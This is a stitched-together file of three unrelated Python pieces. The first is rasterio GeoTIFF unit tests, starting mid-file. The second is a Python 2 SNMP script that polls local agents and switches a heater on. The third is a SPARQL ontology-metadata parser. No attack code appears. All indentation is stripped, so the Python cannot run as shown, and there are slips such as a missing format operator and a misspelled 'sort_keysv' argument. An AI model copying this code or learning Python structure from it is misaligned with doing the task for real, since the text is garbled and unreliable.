self.assertEqual(s.name, 'tests/data/RGB.byte.tif')
self.assertEqual(s.driver, 'GTiff')
self.assertEqual(s.closed, False)
self.assertEqual(s.count, 3)
self.assertEqual(s.width, 791)
self.assertEqual(s.height, 718)
self.assertEqual(s.shape, (718, 791))
self.assertEqual(s.dtypes, [rasterio.ubyte]*3)
self.assertEqual(s.nodatavals, [0]*3)
self.assertEqual(s.indexes, [1,2,3])
self.assertEqual(s.crs['init'], 'epsg:32618')
self.assert_(s.crs_wkt.startswith('PROJCS'), s.crs_wkt)
for i, v in enumerate((101985.0, 2611485.0, 339315.0, 2826915.0)):
self.assertAlmostEqual(s.bounds[i], v)
self.assertEqual(
s.affine,
(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0,
0, 0, 1.0))
self.assertEqual(s.meta['crs'], s.crs)
self.assertEqual(
repr(s),
"<open RasterReader name='tests/data/RGB.byte.tif' "
"mode='r'>")
self.assertEqual(s.closed, True)
self.assertEqual(s.count, 3)
self.assertEqual(s.width, 791)
self.assertEqual(s.height, 718)
self.assertEqual(s.shape, (718, 791))
self.assertEqual(s.dtypes, [rasterio.ubyte]*3)
self.assertEqual(s.nodatavals, [0]*3)
self.assertEqual(s.crs['init'], 'epsg:32618')
self.assertEqual(
s.affine,
(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0,
0, 0, 1.0))
self.assertEqual(
repr(s),
"<closed RasterReader name='tests/data/RGB.byte.tif' "
"mode='r'>")
def test_derived_spatial(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
self.assert_(s.crs_wkt.startswith('PROJCS'), s.crs_wkt)
for i, v in enumerate((101985.0, 2611485.0, 339315.0, 2826915.0)):
self.assertAlmostEqual(s.bounds[i], v)
for a, b in zip(s.ul(0, 0), (101985.0, 2826915.0)):
self.assertAlmostEqual(a, b)
def test_read_ubyte(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read_band(1)
self.assertEqual(a.dtype, rasterio.ubyte)
def test_read_ubyte_bad_index(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
self.assertRaises(IndexError, s.read_band, 0)
def test_read_ubyte_out(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = numpy.zeros((718, 791), dtype=rasterio.ubyte)
a = s.read_band(1, a)
self.assertEqual(a.dtype, rasterio.ubyte)
def test_read_out_dtype_fail(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = numpy.zeros((718, 791), dtype=rasterio.float32)
try:
s.read_band(1, a)
except ValueError as e:
assert "the array's dtype 'float32' does not match the file's dtype" in str(e)
except:
assert "failed to catch exception" is False
def test_read_basic(self):
with rasterio.open('tests/data/shade.tif') as s:
a = s.read(masked=True) # Gray
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (1, 1024, 1024))
self.assertTrue(hasattr(a, 'mask'))
self.assertEqual(a.fill_value, 255)
self.assertEqual(list(set(s.nodatavals)), [255])
self.assertEqual(a.dtype, rasterio.ubyte)
self.assertEqual(a.sum((1, 2)).tolist(), [0])
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read(masked=True) # RGB
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (3, 718, 791))
self.assertTrue(hasattr(a, 'mask'))
self.assertEqual(a.fill_value, 0)
self.assertEqual(list(set(s.nodatavals)), [0])
self.assertEqual(a.dtype, rasterio.ubyte)
a = s.read(masked=False) # no mask
self.assertFalse(hasattr(a, 'mask'))
self.assertEqual(list(set(s.nodatavals)), [0])
self.assertEqual(a.dtype, rasterio.ubyte)
with rasterio.open('tests/data/float.tif') as s:
a = s.read(masked=True) # floating point values
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (1, 2, 3))
self.assert_(hasattr(a, 'mask'))
self.assertEqual(list(set(s.nodatavals)), [None])
self.assertEqual(a.dtype, rasterio.float64)
def test_read_indexes(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read() # RGB
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (3, 718, 791))
self.assertEqual(a.sum((1, 2)).tolist(),
[17008452, 25282412, 27325233])
# read last index as 2D array
a = s.read(s.indexes[-1]) # B
self.assertEqual(a.ndim, 2)
self.assertEqual(a.shape, (718, 791))
self.assertEqual(a.sum(), 27325233)
# read last index as 2D array
a = s.read(s.indexes[-1:]) # [B]
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (1, 718, 791))
self.assertEqual(a.sum((1, 2)).tolist(), [27325233])
# out of range indexes
self.assertRaises(IndexError, s.read, 0)
self.assertRaises(IndexError, s.read, [3, 4])
# read slice
a = s.read(s.indexes[0:2]) # [RG]
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (2, 718, 791))
self.assertEqual(a.sum((1, 2)).tolist(), [17008452, 25282412])
# read stride
a = s.read(s.indexes[::2]) # [RB]
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (2, 718, 791))
self.assertEqual(a.sum((1, 2)).tolist(), [17008452, 27325233])
# read zero-length slice
try:
a = s.read(s.indexes[1:1])
except ValueError:
pass
def test_read_window(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
# correct format
self.assertRaises(ValueError, s.read, window=(300, 320, 320, 330))
# window with 1 nodata on band 3
a = s.read(window=((300, 320), (320, 330)), masked=True)
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (3, 20, 10))
self.assertTrue(hasattr(a, 'mask'))
self.assertEqual(a.mask.sum((1, 2)).tolist(), [0, 0, 1])
self.assertEqual([md5(x.tostring()).hexdigest() for x in a],
['1df719040daa9dfdb3de96d6748345e8',
'ec8fb3659f40c4a209027231bef12bdb',
'5a9c12aebc126ec6f27604babd67a4e2'])
# window without any missing data, but still is masked result
a = s.read(window=((310, 330), (320, 330)), masked=True)
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (3, 20, 10))
self.assertTrue(hasattr(a, 'mask'))
self.assertEqual([md5(x.tostring()).hexdigest() for x in a[:]],
['9e3000d60b4b6fb956f10dc57c4dc9b9',
'6a675416a32fcb70fbcf601d01aeb6ee',
'94fd2733b534376c273a894f36ad4e0b'])
def test_read_window_overflow(self):
"""Test graceful Numpy-like handling of windows that overflow
the dataset's bounds."""
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read(window=((None, 20000), (None, 20000)))
self.assertEqual(a.shape, (3,) + s.shape)
def test_read_window_beyond(self):
"""Test graceful Numpy-like handling of windows beyond
the dataset's bounds."""
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read(window=((10000, 20000), (10000, 20000)))
self.assertEqual(a.shape, (3,0,0))
def test_read_window_overlap(self):
"""Test graceful Numpy-like handling of windows beyond
the dataset's bounds."""
with rasterio.open('tests/data/RGB.byte.tif') as s:
a = s.read(window=((-100, 20000), (-100, 20000)))
self.assertEqual(a.shape, (3,100,100))
def test_read_out(self):
with rasterio.open('tests/data/RGB.byte.tif') as s:
# regular array, without mask
a = numpy.empty((3, 718, 791), numpy.ubyte)
b = s.read(out=a)
self.assertFalse(hasattr(a, 'mask'))
self.assertFalse(hasattr(b, 'mask'))
# with masked array
a = numpy.ma.empty((3, 718, 791), numpy.ubyte)
b = s.read(out=a)
self.assertEqual(id(a.data), id(b.data))
# TODO: is there a way to id(a.mask)?
self.assertTrue(hasattr(a, 'mask'))
self.assertTrue(hasattr(b, 'mask'))
# use all parameters
a = numpy.empty((1, 20, 10), numpy.ubyte)
b = s.read([2], a, ((310, 330), (320, 330)), False)
self.assertEqual(id(a), id(b))
# pass 2D array with index
a = numpy.empty((20, 10), numpy.ubyte)
b = s.read(2, a, ((310, 330), (320, 330)), False)
self.assertEqual(id(a), id(b))
self.assertEqual(a.ndim, 2)
# different data types
a = numpy.empty((3, 718, 791), numpy.float64)
self.assertRaises(ValueError, s.read, out=a)
# different number of array dimensions
a = numpy.empty((20, 10), numpy.ubyte)
self.assertRaises(ValueError, s.read, [2], out=a)
# different number of array shape in 3D
a = numpy.empty((2, 20, 10), numpy.ubyte)
self.assertRaises(ValueError, s.read, [2], out=a)
def test_read_nan_nodata(self):
with rasterio.open('tests/data/float_nan.tif') as s:
a = s.read(masked=True)
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (1, 2, 3))
self.assertTrue(hasattr(a, 'mask'))
self.assertNotEqual(a.fill_value, numpy.nan)
self.assertEqual(str(list(set(s.nodatavals))), str([numpy.nan]))
self.assertEqual(a.dtype, rasterio.float32)
self.assertFalse(numpy.isnan(a).any())
a = s.read(masked=False)
self.assertFalse(hasattr(a, 'mask'))
self.assertTrue(numpy.isnan(a).any())
# Window does not contain a nodatavalue, result is still masked
a = s.read(window=((0, 2), (0, 2)), masked=True)
self.assertEqual(a.ndim, 3)
self.assertEqual(a.shape, (1, 2, 2))
self.assertTrue(hasattr(a, 'mask'))
| |
from pysnmp.hlapi import *
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher
from pysnmp.carrier.asynsock.dgram import udp
from pysnmp.carrier.asyncore.dgram import udp, udp6, unix
from pyasn1.codec.ber import encoder, decoder
from pysnmp.proto import api
from time import time
import threading
from twisted.internet import task
from twisted.internet import reactor
lights = ["OFF"]
class SysDescr:
name = (1,3,6,1,1,2,3,4,1)
def __eq__(self, other): return self.name == other
def __ne__(self, other): return self.name != other
def __lt__(self, other): return self.name < other
def __le__(self, other): return self.name <= other
def __gt__(self, other): return self.name > other
def __ge__(self, other): return self.name >= other
def __call__(self, protoVer):
return api.protoModules[protoVer].OctetString(
"Test"
)
class ServerThread (threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
print "Starting thread 2" + self.name
openServer()
print "Exiting thread 2" + self.name
def pollFn():
#Check the heater status
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
CommunityData('public',mpModel=0),
UdpTransportTarget(('localhost', 1162)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (
errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex)-1][0] or '?'
)
)
else:
for varBind in varBinds:
print(' = '.join([ x.prettyPrint() for x in varBind ]))
# Get the temperature
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
CommunityData('public',mpModel=0),
UdpTransportTarget(('localhost', 1161)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (
errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex)-1][0] or '?'
)
)
else:
#for varBind in varBinds:
# print(' = '.join([ x.prettyPrint() for x in varBind ]))
#SET Command
#Check if the temperature is less than 10
for oid, val in varBinds:
print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
returnedVal = int(val)
if (returnedVal < 10):
print returnedVal
# Protocol version to use
#pMod = api.protoModules[api.protoVersion1]
pMod = api.protoModules[api.protoVersion2c]
# Build PDU
reqPDU = pMod.SetRequestPDU()
pMod.apiPDU.setDefaults(reqPDU)
pMod.apiPDU.setVarBinds(
reqPDU,
# Change the heater status to ON
( ('1.3.6.1.2.1.1.1.0', pMod.OctetString('ON')),
# ('1.3.6.1.2.1.1.3.0', pMod.TimeTicks(12))
)
)
# Build message
reqMsg = pMod.Message()
pMod.apiMessage.setDefaults(reqMsg)
pMod.apiMessage.setCommunity(reqMsg, 'public')
pMod.apiMessage.setPDU(reqMsg, reqPDU)
startedAt = time()
def cbTimerFun(timeNow):
if timeNow - startedAt > 3:
raise Exception("Request timed out")
def cbRecvFun(transportDispatcher, transportDomain, transportAddress,
wholeMsg, reqPDU=reqPDU):
while wholeMsg:
rspMsg, wholeMsg = decoder.decode(wholeMsg, asn1Spec=pMod.Message())
rspPDU = pMod.apiMessage.getPDU(rspMsg)
# Match response to request
if pMod.apiPDU.getRequestID(reqPDU)==pMod.apiPDU.getRequestID(rspPDU):
# Check for SNMP errors reported
errorStatus = pMod.apiPDU.getErrorStatus(rspPDU)
if errorStatus:
print(errorStatus.prettyPrint())
else:
for oid, val in pMod.apiPDU.getVarBinds(rspPDU):
print('%s = %s' (oid.prettyPrint(), val.prettyPrint()))
transportDispatcher.jobFinished(1)
return wholeMsg
transportDispatcher = AsynsockDispatcher()
transportDispatcher.registerRecvCbFun(cbRecvFun)
transportDispatcher.registerTimerCbFun(cbTimerFun)
# UDP/IPv4
transportDispatcher.registerTransport(
udp.domainName, udp.UdpSocketTransport().openClientMode()
)
# Pass message to dispatcher
transportDispatcher.sendMessage(
encoder.encode(reqMsg), udp.domainName, ('localhost', 1162)
)
transportDispatcher.jobStarted(1)
# Dispatcher will finish as job#1 counter reaches zero
transportDispatcher.runDispatcher()
transportDispatcher.closeDispatcher()
else:
print "value greater than 10"
def newFn(transportDispatcher, transportDomain, transportAddress, wholeMsg):
print "Lights status:"
print lights[0]
while wholeMsg:
msgVer = int(api.decodeMessageVersion(wholeMsg))
if msgVer in api.protoModules:
pMod = api.protoModules[msgVer]
else:
print('Unsupported SNMP version %s' % msgVer)
return
reqMsg, wholeMsg = decoder.decode(
wholeMsg, asn1Spec=pMod.Message(),
)
"""
print('Notification message from %s:%s: %s ' % (
transportDomain, transportAddress, wholeMsg
)
)
"""
reqPDU = pMod.apiMessage.getPDU(reqMsg)
if reqPDU.isSameTypeWith(pMod.TrapPDU()):
if msgVer == api.protoVersion1:
"""
print('Enterprise: %s' % (
pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()
)
)
print('Agent Address: %s' % (
pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()
)
)
print('Generic Trap: %s' % (
pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()
)
)
print('Specific Trap: %s' % (
pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()
)
)
print('Uptime: %s' % (
pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()
)
)
"""
varBinds = pMod.apiTrapPDU.getVarBindList(reqPDU)
else:
varBinds = pMod.apiPDU.getVarBindList(reqPDU)
for oid, val in varBinds:
#print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
print "RECEIVED a TRAP Message from Light Agent :"
lights[0] = (((str(val).split("OctetString('"))[1]).split("')))"))[0]
print (((str(val).split("OctetString('"))[1]).split("')))"))[0]
return wholeMsg
def openServer():
print "In Open server mode"
transportDispatcher = AsyncoreDispatcher()
transportDispatcher.registerRecvCbFun(newFn)
# UDP/IPv4
transportDispatcher.registerTransport(
udp.domainName, udp.UdpSocketTransport().openServerMode(('localhost', 1171))
)
# UDP/IPv6
transportDispatcher.registerTransport(
udp6.domainName, udp6.Udp6SocketTransport().openServerMode(('::1', 1171))
)
transportDispatcher.jobStarted(1)
print "job started"
transportDispatcher.runDispatcher()
transportDispatcher.closeDispatcher()
if __name__ == "__main__":
serverThread = ServerThread(1, "Thread-Server", 1)
# Start the server thread
serverThread.start()
timeout = 12.0 # Sixty seconds
l = task.LoopingCall(pollFn)
l.start(timeout) # call every sixty seconds
reactor.run()
| |
#!/usr/bin/env python2.7
# encoding: utf-8
# abremaud@esciencefactory.com 20160204
import datetime, copy, rdflib, csv, json, time
from rdflib import Graph
from SparqlOntoParser_supports import get_json
from SparqlOntoParser_supports import inputStringCheck, checkEndpointResponds, stringSimilarity
from SparqlOntoParser_supports import obtainPredicateCount, mergeQueryResults
from SparqlOntoParser_supports import modifyQueryForSubgraph, modifyQueryAddLimitAndOffset
from SparqlOntoParser_supports import sparqlOneEndpoint, urllibOneEndpoint
class OntologyClass(object):
def __init__(self):
self.labels = []
self.synonyms = []
self.direct_parents = []
self.ancestors = []
self.direct_children = []
self.descendants = []
self.uris = []
self.description = []
self.indexed_date = ""
self.text_auto = "empty"
# abremaud 20160427
self.short_form = "" # not originally included
self.ontology_iri = "" # not originally included
self.ontology_name = "" # not originally included
self.ontology_acronym = "" # not originally planned
self.ontology_version = "" # not originally planned
self.ontology_vdate = "" # not originally planned
def create_text_auto_from_labels(self):
#merge labels
if self.labels:
self.text_auto = ' '.join(self.labels)
def create_short_form_from_uris(self):
#retrieve character sequence following last slash character of a uri
if self.uris:
rev_url = self.uris[0][::-1]
self.short_form = rev_url[:rev_url.find('/')][::-1]
def api_ontology_metadata(self, apikey=None):
try:
if self.ontology_iri:
if apikey:
j = get_json(str(self.ontology_iri), str(apikey))
else:
j= get_json(str(self.ontology_iri))
if isinstance(j, dict):
for k in ["name", "acronym"]:
if k in j.keys() and isinstance(j[k], (str, unicode)):
if k=="name": self.ontology_name.append(j[k])
if k=="acronym": self.ontology_acronym.append(j[k])
except:
pass
def to_JSON(self):
return json.dumps(self, default=lambda o: o.__dict__,
sort_keysv=True, indent=4)
def fillOntoClassField(onto_class=None, fieldname=None, info=None):
out = None
try:
if onto_class and fieldname and info:
if isinstance(onto_class, OntologyClass):
if isinstance(fieldname, (str, unicode)):
if fieldname in onto_class.__dict__.keys():
if isinstance(onto_class.__dict__[fieldname], (str, unicode)):
if isinstance(info, (str, unicode)):
onto_class.__dict__[fieldname] = info
elif isinstance(info, list):
for item in info:
onto_class = fillOntoClassField(onto_class, fieldname, item)
elif isinstance(onto_class.__dict__[fieldname], list):
if isinstance(info, (str, unicode)) and info not in onto_class.__dict__[fieldname]:
onto_class.__dict__[fieldname].append(info)
elif isinstance(info, list):
for item in info:
onto_class = fillOntoClassField(onto_class, fieldname, item)
out = onto_class
except:
"could not fill ontology class field with provided info."
return out
def updateOntoClassFields(onto_class=None, r=None):
out = None
try:
if onto_class and r:
if isinstance(onto_class, OntologyClass) and isinstance(r, dict):
for k in r.keys():
if isinstance(k, (str, unicode)):
if r[k]:
if isinstance(r[k], dict):
if "value" in r[k].keys():
if isinstance(r[k]["value"], (str, unicode)):
onto_class = fillOntoClassField(onto_class, k, r[k]["value"])
onto_class.create_text_auto_from_labels()
#set datetime
date_now = datetime.datetime.today().strftime("%Y-%m-%dT00:00:00Z")
onto_class.indexed_date = date_now
out = onto_class
except:
print "Could not update ontology class fields."
return out
def buildOntoClassContainer(res):
out = None
try:
if res:
if isinstance(res, dict):
if "results" in res.keys():
if isinstance(res["results"], dict):
if "bindings" in res["results"].keys():
if isinstance(res["results"]["bindings"], list):
container = []
classes_analysed = set()
counter = 0
for r in res["results"]["bindings"]:
counter += 1
if "uris" in r.keys() and "value" in r["uris"].keys() and isinstance(r["uris"]["value"], (str, unicode)):
curr_class = None
if r["uris"]["value"] in classes_analysed:
for exist_class in container:
if r["uris"]["value"] in exist_class.uris:
curr_class = exist_class
break
if not curr_class:
curr_class = OntologyClass()
curr_class.uris.append( r["uris"]["value"] )
curr_class.create_short_form_from_uris()
if curr_class:
curr_class = updateOntoClassFields(curr_class, r)
if r["uris"]["value"] in classes_analysed:
container = [exist_class for exist_class in container if r["uris"]["value"] not in exist_class.uris]
container.append( curr_class )
classes_analysed.add( r["uris"]["value"] )
out = [oc.__dict__ for oc in container]
except:
print "Could not build container of ontology classes."
return out
def jsonOrFollow(url=None, pids=None, apikey=None, binding=None, follow_keys_list=None):
out = None
try:
if not binding: binding = {}
o_meta = None
if url:
if isinstance(url, (str, unicode)):
if not apikey:
o_meta = get_json(str(url))
elif isinstance(apikey, str):
o_meta = get_json(str(url), apikey)
elif isinstance(apikey, unicode):
o_meta = get_json(str(url), str(apikey))
if o_meta and pids:
if isinstance(o_meta, dict) and isinstance(pids, tuple):
for p in pids:
if isinstance(p, dict):
for k in p.keys():
if p[k] in o_meta.keys():
if isinstance(o_meta[p[k]], (str, unicode)):
binding[unicode(k)] = {u'type': u'typed-literal', u'value': o_meta[p[k]]}
elif isinstance(o_meta[p[k]], list):
for elit in o_meta[p[k]]:
if isinstance(elit, (str,unicode)):
if k not in binding.keys():
binding[unicode(k)] = []
binding[unicode(k)].append({u'type': u'typed-literal', u'value': elit})
elif follow_keys_list:
if isinstance(follow_keys_list, list):
for item in follow_keys_list:
binding = jsonOrFollow(url, pids, apikey, binding, item)
if isinstance(follow_keys_list, (str, unicode)):
if "links" in o_meta.keys() and isinstance(o_meta["links"], dict) and follow_keys_list in o_meta["links"].keys():
if isinstance(o_meta["links"][follow_keys_list], (str, unicode)):
binding = jsonOrFollow(o_meta["links"][follow_keys_list], pids, apikey, binding)
out = binding
except:
print "Could not json_or_follow."
return out
def addOntoMetadataToMockSparql(res=None, pids=None, apikey=None):
out = None
try:
prev_onto_dict = {}
if res:
if isinstance(res, dict):
if "results" in res.keys():
if isinstance(res["results"], dict):
if "bindings" in res["results"].keys():
if isinstance(res["results"]["bindings"], list):
for item in res["results"]["bindings"]:
if isinstance(item, dict):
if "ontology_iri" in item.keys():
if isinstance(item["ontology_iri"], dict):
if "value" in item["ontology_iri"].keys():
if isinstance(item["ontology_iri"]["value"], (str, unicode)):
binding = {}
if item["ontology_iri"]["value"] in prev_onto_dict.keys():
binding = prev_onto_dict[item["ontology_iri"]["value"]]
else:
binding = jsonOrFollow(item["ontology_iri"]["value"], pids, apikey, None, "latest_submission")
if binding:
if isinstance(binding, dict):
prev_onto_dict[item["ontology_iri"]["value"]] = binding
if binding:
if isinstance(binding, dict):
for k in binding.keys():
if isinstance(k, (str, unicode)) and "ontology_" in k:
if "head" in res.keys():
if isinstance(res["head"], dict):
if "vars" in res["head"].keys():
if isinstance(res["head"]["vars"], list):
if k not in res["head"]["vars"]:
res["head"]["vars"].append(unicode(k))
item[unicode(k)] = binding[k]
out = res
except:
print "Could not add ontology metadata info to mock sparql json."
return out
def fillMockSparqlResultObjectWithCollectionItemInfo(coll_item=None, pids=None, res=None):
out = None
try:
if coll_item and pids and res:
if isinstance(coll_item, dict) and isinstance(pids, tuple) and isinstance(res, dict):
binding = {}
for p in pids:
if isinstance(p, dict):
for k in p.keys():
if k:
fld_ctnt = None
if p[k] in coll_item.keys():
fld_ctnt = coll_item[p[k]]
elif "links" in coll_item.keys() and isinstance(coll_item["links"], dict) and p[k] in coll_item["links"].keys():
fld_ctnt = coll_item["links"][p[k]]
if fld_ctnt:
if isinstance(fld_ctnt, (str, unicode)):
if k not in res["head"]["vars"]: res["head"]["vars"].append(unicode(k))
if k == "uris" or k == "ontology_iri":
binding[unicode(k)] = {u'type': u'uri', u'value': unicode(fld_ctnt)}
else:
binding[unicode(k)] = {u'type': u'typed-literal', u'value': unicode(fld_ctnt)}
for k in p.keys():
if k:
fld_ctnt = None
if p[k] in coll_item.keys():
fld_ctnt = coll_item[p[k]]
elif "links" in coll_item.keys() and isinstance(coll_item["links"], dict) and \
p[k] in coll_item["links"].keys():
fld_ctnt = coll_item["links"][p[k]]
if fld_ctnt:
if isinstance(fld_ctnt, list):
for item in fld_ctnt:
if isinstance(item, (str, unicode)):
if k not in res["head"]["vars"]: res["head"]["vars"].append(unicode(k))
binding[unicode(k)] = {u'type': u'typed-literal', u'value': unicode(item)}
res["results"]["bindings"].append(copy.deepcopy(binding))
if binding and binding not in res["results"]["bindings"]: res["results"]["bindings"].append(binding)
out = res
except:
print "Could not fill mock SPARQL result object with collection item information."
return out
def makeMockSparqlResultFromAPIclassCollection(props, pids):
out = None
try:
if props and pids:
if isinstance(props, dict) and isinstance(pids, tuple):
if "collection" in props.keys():
if isinstance(props["collection"], list):
res = {u'head': {u'link': [], u'vars': []}, u'results': {u'distinct': False, u'bindings': [], u'ordered': True}}
for coll_item in props["collection"]:
if isinstance(coll_item, dict) and isinstance(pids, tuple) and isinstance(res, dict):
res = fillMockSparqlResultObjectWithCollectionItemInfo( coll_item, pids, res )
out = res
except:
print "Could not make mock SPARQL result from API class collection."
return out
def apiGatherPropertySetValuesFromAllClasses(from_uri=None, apikey=None, pids=None):
out = None
try:
if from_uri and apikey and pids:
if isinstance(from_uri, str) and isinstance(apikey, str) and isinstance(pids, tuple):
rpp = 1000
props = None
props = get_json( from_uri + "/classes?pagesize=" + str(rpp), apikey )
if props and isinstance(props, dict):
container = []
if "pageCount" in props.keys():
pageCount = props["pageCount"]
start = time.time()
for curr_page in range(pageCount):
props = None
props = get_json( from_uri + "/classes?pagesize=" + str(rpp) + "&page=" + str(curr_page+1), apikey )
res = makeMockSparqlResultFromAPIclassCollection(props, pids)
res = addOntoMetadataToMockSparql(res, pids, apikey)
page_container = None
page_container = buildOntoClassContainer(res)
if page_container: container += page_container
print "Processing page", str(curr_page+1) + "/" + str(pageCount), "using pageCount method.", \
len(container), "in", time.time()-start, "s"
elif "nextPage" in props.keys():
nextPage = True
while nextPage:
#print "Processing page", nextPage, "using nextPage method."
nextPage = False
nextPage = props["nextPage"]
res = makeMockSparqlResultFromAPIclassCollection(props, pids)
res = addOntoMetadataToMockSparql(res, pids, apikey)
page_container = []
page_container = buildOntoClassContainer(res)
if page_container: container += page_container
props = None
if nextPage:
props = get_json( from_uri + "/classes?pagesize=" + str(rpp) + "&page=" + str(nextPage), apikey )
else:
res = makeMockSparqlResultFromAPIclassCollection(props, pids)
res = addOntoMetadataToMockSparql(res, pids, apikey)
container = buildOntoClassContainer(res)
out = container
except:
print "Could gather set of properties from all API classes."
return out
def repeatQueryInSmallerChunks(endpoint=None, pids=None, from_uri=None, apikey=None, endpoint_type=None):
out = None
try:
if endpoint and pids:
if isinstance(endpoint, str) and isinstance(pids, tuple):
res_p = None
res_t = dict()
worksatall = False
pids_test = tuple()
pids_works = tuple()
nsws = None
if endpoint_type:
if isinstance(endpoint_type, (str, unicode)):
if endpoint_type == "endpoint_nsws":
nsws = True
for p in pids:
if isinstance(p, dict):
p_test = {}
p_works = {}
pids_test += (p_test,)
pids_works += (p_works,)
for k in p.keys():
if isinstance(p[k], (str, unicode)):
p_test[k] = p[k]
query = makeQueryForPropertyValues( pids_test )
if from_uri and not nsws:
if isinstance(from_uri, str):
query = modifyQueryForSubgraph( query, from_uri )
query = modifyQueryAddLimitAndOffset(query, 1)
query = query[:query.find("LIMIT")] + "ORDER BY ?id\n" + query[query.find("LIMIT"):]
res_p = None
if nsws:
res_p = urllibOneEndpoint( endpoint, query, from_uri, apikey )
else:
res_p = sparqlOneEndpoint( endpoint, query, apikey )
if res_p:
worksatall = True
p_works[k] = p[k]
else:
p_test = {z:p_works[z] for z in p_works.keys()}
if not worksatall: break
if res_p: res_t = res_p
if worksatall:
bind_empty = 0
attempts = 1
successes = 1
offset = 1
limit = 2
while bind_empty<10 and successes>0 and successes>attempts/10:
attempts += 1
query = makeQueryForPropertyValues( pids_works )
if from_uri and not nsws:
if isinstance(from_uri, str):
query = modifyQueryForSubgraph( query, from_uri )
query = modifyQueryAddLimitAndOffset(query, limit, offset)
query = query[:query.find("LIMIT")] + "ORDER BY ?id\n" + query[query.find("LIMIT"):]
try:
res_c = None
if nsws:
res_c = urllibOneEndpoint( endpoint, query, from_uri, apikey )
else:
res_c = sparqlOneEndpoint( endpoint, query, apikey )
if res_c:
successes += 1
offset = offset + limit
if isinstance(res_c, dict):
if "results" in res_c.keys():
if isinstance(res_c["results"], dict):
if "bindings" in res_c["results"].keys():
if isinstance(res_c["results"]["bindings"], list):
if len(res_c["results"]["bindings"]) > 0:
res_t = mergeQueryResults(res_t, res_c)
bind_empty = 0
limit = limit * 2
else:
bind_empty += 1
else:
limit = max(1, int(limit/2))
except:
limit = max(1, int(limit/2))
pass
if res_t: out = res_t
except:
print "Could not repeat query in smaller chunks."
return out
def sparqlGatherPropertySetvaluesFromAllClasses( endpoint=None, pids=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
if endpoint and pids:
if isinstance( endpoint, str ) and isinstance( pids, tuple ):
res = None
query = makeQueryForPropertyValues(pids)
if endpoint_type:
if isinstance(endpoint_type, (str, unicode)):
if endpoint_type == "endpoint_nsws":
res = urllibOneEndpoint(endpoint, query, from_uri, apikey)
if not res:
if checkEndpointResponds( endpoint, from_uri, apikey ):
if from_uri:
if isinstance( from_uri, str ):
query = modifyQueryForSubgraph( query, from_uri )
res = sparqlOneEndpoint( endpoint, query, apikey )
if not res: res = repeatQueryInSmallerChunks( endpoint, pids, from_uri, apikey, endpoint_type )
out = buildOntoClassContainer( res )
except:
print "Could not gather set of properties from all sparql endpoint classes."
return out
def repeatPropQueryWithDecreasingLimit( endpoint=None, query=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
if endpoint and query:
if inputStringCheck(endpoint) and inputStringCheck(query):
res = None
sws = None
if endpoint_type:
if isinstance(endpoint_type, (str, unicode)):
if endpoint_type == "endpoint_nsws":
res = urllibOneEndpoint(endpoint, query, from_uri, apikey)
if not res:
sws = checkEndpointResponds(endpoint, from_uri, apikey)
if sws:
if from_uri:
if inputStringCheck(from_uri):
query = modifyQueryForSubgraph( query, from_uri )
res = sparqlOneEndpoint( endpoint, query, apikey )
#print res
if not res:
pred_count = None
pred_count = obtainPredicateCount( endpoint, from_uri, apikey, endpoint_type )
if pred_count:
offset = 0
limit = max(1, int(pred_count/2))
while offset < pred_count and limit>0:
print "processing:", offset, "+", limit
if limit < 1: limit = 1
if offset + limit > pred_count:
limit = pred_count - offset + 1
q = modifyQueryAddLimitAndOffset( query, limit, offset )
q = q[:q.find("LIMIT")] + "\nORDER BY ?oo\n" + q[q.find("LIMIT"):]
print q
r = None
if sws:
r = sparqlOneEndpoint( endpoint, q, apikey )
else:
r = urllibOneEndpoint( endpoint, q, from_uri, apikey )
if r:
if res:
res = mergeQueryResults( res, r )
else:
res = r
offset += limit
else:
if limit <= 1:
break
limit = max(1, int(limit/2))
out = res
except:
print "Could not repeat query with decreasing limit."
return out
